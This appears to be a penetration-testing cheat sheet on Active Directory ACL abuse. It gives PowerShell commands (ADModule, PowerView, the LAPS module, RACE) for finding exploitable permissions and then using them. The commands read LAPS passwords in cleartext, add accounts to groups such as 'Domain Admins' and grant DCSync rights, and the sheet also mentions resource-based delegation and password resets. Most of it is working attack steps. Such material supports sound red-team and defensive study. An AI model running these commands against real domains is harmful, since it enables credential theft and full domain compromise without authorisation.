ACL Abuse

Enumeration

ADModule
PowerView_Dev
PowerView
ADModule
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get DistinguishedName
Get-ADUser -Identity USER
# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
PowerView_Dev
Find-InterestingDomainACL -ResolveGUIDs
PowerView
Invoke-ACLScanner -ResolveGUIDs

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.

LAPS Module
LAPS Module
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group

ADModule
PowerView_dev
ADModule
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
# Check
Get-ADGroupMember -Identity "LocalAdmins"
PowerView_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack

GenericAll over User Object

Can reset their password without knowing the old one

WriteDACL over DC

Can give DCSync privs to user

RACE
RACE
Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose

Resources